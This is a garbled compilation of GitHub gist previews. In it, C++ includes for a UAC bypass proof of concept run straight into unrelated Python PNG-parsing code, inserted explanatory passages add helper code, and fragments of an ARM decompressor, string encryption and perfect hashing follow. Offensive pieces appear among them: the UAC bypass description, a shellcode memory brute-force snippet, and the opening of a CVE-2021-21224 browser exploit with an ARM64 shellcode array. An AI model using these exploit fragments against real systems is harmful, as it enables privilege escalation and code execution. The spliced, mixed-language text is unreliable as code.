/*
TaskManagerSecret
Author: @splinter_code
This is a very ugly POC for a very unreliable UAC bypass through some UI hacks.
The core of this hack is stealing and using a token containing the UIAccess flag set.
A trick described by James Forshaw, so all credits to him --> https://www.tiraniddo.dev/2019/02/accessing-access-tokens-for-uiaccess.html
From there it uses a task manager "feature" to run a new High IL cmd.exe.
This has been developed only for fun and shouldn't be used due to its high unreliability.
*/
#define _AFXDLL
#include <WinSock2.h> // MFC...
#include <windows.h>
#include <afxwin.h> // CBitmap
#include <atlbase.h>
#include <atlcom.h> // CComPtr
#include <d2d1.h>
#include <d2d1_3.h> // ID2D1DeviceContext5
#include <wincodec.h> // Wic
import zlib
import io
import sys
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
def parse_png_chunk(stream):
    size = int.from_bytes(stream.read(4), "big")
    ctype = stream.read(4)
    body = stream.read(size)
    # The preview ends here. A PNG chunk is followed by a 4-byte CRC-32 over
    # type + data; reading and checking it completes the function.
    csum = int.from_bytes(stream.read(4), "big")
    assert zlib.crc32(ctype + body) == csum
    return ctype, body
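As an added example (not part of the gist previewed above), here is a chunk walker in Python built on the same chunk layout: it verifies each chunk's CRC-32, stops at IEND and reports any bytes that follow it. The sample image is constructed inline, and `read_chunk`, `walk_png`, `make_chunk`, `build_sample_png` and `is_valid_png` are names chosen here, not from the gist.

```python
import io
import struct
import zlib

PNG_MAGIC = b"\x89PNG\r\n\x1a\n"


def read_chunk(stream):
    """Read one chunk: 4-byte big-endian length, 4-byte type, data, then a
    4-byte CRC-32 over type + data. Raises ValueError on a short read or a
    CRC mismatch, so a truncated or tampered chunk never comes back silently."""
    header = stream.read(8)
    if len(header) < 8:
        raise ValueError("truncated chunk header")
    size, ctype = struct.unpack(">I4s", header)
    body = stream.read(size)
    crc_bytes = stream.read(4)
    if len(body) < size or len(crc_bytes) < 4:
        raise ValueError("truncated chunk %r" % ctype)
    (crc,) = struct.unpack(">I", crc_bytes)
    if zlib.crc32(ctype + body) & 0xFFFFFFFF != crc:
        raise ValueError("CRC mismatch in chunk %r" % ctype)
    return ctype, body


def walk_png(data):
    """Return (chunks, trailing): chunks is the list of (type, body) up to and
    including IEND; trailing is whatever follows IEND (b"" for a clean file).
    Decoders stop at IEND, so trailing bytes are invisible to a viewer but
    still travel with the file."""
    if not data.startswith(PNG_MAGIC):
        raise ValueError("not a PNG")
    stream = io.BytesIO(data[len(PNG_MAGIC):])
    chunks = []
    while True:
        ctype, body = read_chunk(stream)
        chunks.append((ctype, body))
        if ctype == b"IEND":
            break
    return chunks, stream.read()


def is_valid_png(data):
    """True when the file parses through IEND with every CRC intact."""
    try:
        walk_png(data)
        return True
    except ValueError:
        return False


def make_chunk(ctype, body):
    """Encode a chunk with the correct length prefix and CRC (for the sample)."""
    crc = zlib.crc32(ctype + body) & 0xFFFFFFFF
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)


def build_sample_png(trailing=b""):
    """Constructed sample: a 1x1 8-bit greyscale PNG, optionally followed by
    extra bytes after IEND."""
    # width, height, bit depth, colour type 0 (grey), compression, filter, interlace
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)
    idat = zlib.compress(b"\x00\x00")  # filter byte 0 + one grey pixel
    return (PNG_MAGIC + make_chunk(b"IHDR", ihdr) + make_chunk(b"IDAT", idat)
            + make_chunk(b"IEND", b"") + trailing)


if __name__ == "__main__":
    chunks, trailing = walk_png(build_sample_png(b"leftover"))
    print([t for t, _ in chunks], trailing)
```

Rejecting short reads and CRC mismatches up front is what keeps a chunk walker from being driven past the end of the buffer by a forged length field; the trailing-bytes return is the cheap check for data that a viewer would never show you.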
@ManDeJan
ManDeJan / decompress.asm
Last active April 4, 2023 03:38
decompress.asm
.cpu cortex-m3
.syntax unified @ this is important, you won't get most of thumb-2 otherwise
.text
@ this file contains an assembly version of a lz decoder for cpse1 at the hogeschool utrecht
@ it's done in 15 instructions / 40 bytes, 20% less than what the best compiler did :)
@ compiler benchmarks
@ clang (trunk)
@ -O0 124 bytes
@aaaddress1
aaaddress1 / memBruteforce.cpp
Last active October 31, 2025 13:25
Windows 32-bit Shellcode Design without TEB & fs:30h
// memBruteforce.cpp by [email protected]
// brute-force search for loaded modules in memory
// rewrite from https://www.exploit-db.com/exploits/45293
#include <Windows.h>
#include <iostream>
#pragma warning(disable:4996)
bool isMemExist(size_t addr) {
    int retv;
    __asm {
@EvanMcBroom
EvanMcBroom / no_strings.hpp
Last active October 27, 2025 14:48
Encrypt Strings at Compile Time
// Copyright (C) 2022 Evan McBroom
//
// Permission is hereby granted, free of charge, to any person obtaining a copy
// of this software and associated documentation files (the "Software"), to deal
// in the Software without restriction, including without limitation the rights
// to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
// copies of the Software, and to permit persons to whom the Software is
// furnished to do so, subject to the following conditions:
//
// The above copyright notice and this permission notice shall be included in
@wdormann
wdormann / CVE-2021-21224.html
Last active October 31, 2022 22:01
Sample ARM64 PoC for CVE-2021-21224
<script>
function gc() {
for (var i = 0; i < 0x80000; ++i) {
var a = new ArrayBuffer();
}
}
let shellcode = [
// Move x18 to x28 (TEB)
@mjosaarinen
mjosaarinen / cmov_vs_ct.txt
Created April 13, 2021 08:35
CMOV vs Constant-Time
Markku-Juhani O. Saarinen <[email protected]>
Apr 11, 2021, 9:32 PM (2 days ago)
to [email protected], [email protected].
Hello Bitmanip and Krypto,
A colleague asked: "Why CMOV is not on the constant-time Zkt list -- the Bitmanip specification says that it is helpful for cryptography?" https://github.com/rvkrypto/riscv-zkt-list
# Hash, displace, and compress: http://cmph.sourceforge.net/papers/esa09.pdf
# This is expected linear time for any seeded hash function that acts like a random hash function (universality isn't enough).
# (Actually, the code as written is O(n log n) when targeting 100% load. It's O(n) when targeting any smaller load factor.)
# You can make keys_per_bucket higher than the default of 4 but construction time will start to increase dramatically.
# The paper this is based on compresses the seeds (so the fact that the algorithm tries seeds in increasing order is important)
# which brings the representation size close to the information-theoretical minimum. I don't do any of that here, but it could
# be done as a postprocess.
def make_perfect_hash(keys, load_factor=1.0, keys_per_bucket=4, rhash=murmurhash, max_seed=1000000):
    m = int(len(keys) / load_factor)
    r = int(len(keys) / keys_per_bucket)
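The comment above describes the construction, but the preview stops at the two sizing lines. As an added example, not the gist author's code, here is a complete hash-and-displace construction plus lookup in Python that follows that description: keys are bucketed, buckets are placed largest first, and each bucket tries seeds in increasing order until all of its keys land in distinct free slots of the table. `mix64` is a stand-in for the `murmurhash` the preview expects (assumed to take `(key, seed)`), `perfect_hash_lookup` is a name chosen here, and the seed compression the comment mentions is left out here too.

```python
MASK64 = (1 << 64) - 1


def mix64(key, seed):
    """Seeded 64-bit mixing hash over bytes (splitmix64-style constants). It
    stands in for murmurhash: it only needs to behave like a random function
    of (key, seed); it is not a cryptographic hash."""
    h = ((seed + 0x9E3779B97F4A7C15) * 0xBF58476D1CE4E5B9) & MASK64
    for b in key:
        h = ((h ^ b) * 0x94D049BB133111EB) & MASK64
        h ^= h >> 29
    h = (h * 0xBF58476D1CE4E5B9) & MASK64
    return h ^ (h >> 31)


def make_perfect_hash(keys, load_factor=1.0, keys_per_bucket=4, rhash=mix64, max_seed=1000000):
    """Hash, displace (and no compress) construction.

    Returns (seeds, m, r): one seed per bucket, the table size m and the bucket
    count r. A key's slot is rhash(key, seeds[bucket]) % m, where
    bucket = rhash(key, 0) % r; seed 0 is reserved for bucket selection."""
    n = len(keys)
    if len(set(keys)) != n:
        raise ValueError("keys must be distinct; duplicates can never be separated")
    m = max(1, int(n / load_factor))        # table size
    r = max(1, int(n / keys_per_bucket))    # number of buckets
    buckets = [[] for _ in range(r)]
    for k in keys:
        buckets[rhash(k, 0) % r].append(k)
    seeds = [0] * r
    occupied = [False] * m
    # Largest buckets first: they are the hardest to place, so they get the emptiest table.
    for b in sorted(range(r), key=lambda i: len(buckets[i]), reverse=True):
        bucket = buckets[b]
        if not bucket:
            continue
        for seed in range(1, max_seed):     # increasing order keeps the stored seeds small
            slots = [rhash(k, seed) % m for k in bucket]
            if len(set(slots)) == len(slots) and not any(occupied[s] for s in slots):
                for s in slots:
                    occupied[s] = True
                seeds[b] = seed
                break
        else:
            raise ValueError("no seed found for bucket %d within max_seed" % b)
    return seeds, m, r


def perfect_hash_lookup(key, seeds, m, r, rhash=mix64):
    """Slot of key in the table built by make_perfect_hash: two hashes, O(1)."""
    return rhash(key, seeds[rhash(key, 0) % r]) % m


if __name__ == "__main__":
    # constructed key set
    sample = [("key-%d" % i).encode() for i in range(40)]
    seeds, m, r = make_perfect_hash(sample, load_factor=0.5)
    print(sorted(perfect_hash_lookup(k, seeds, m, r) for k in sample))
```

The lookup is only a perfect hash for the key set it was built on: a key that was not in `keys` still maps to some slot, so the table itself (or a stored copy of the key) has to be checked before trusting a hit.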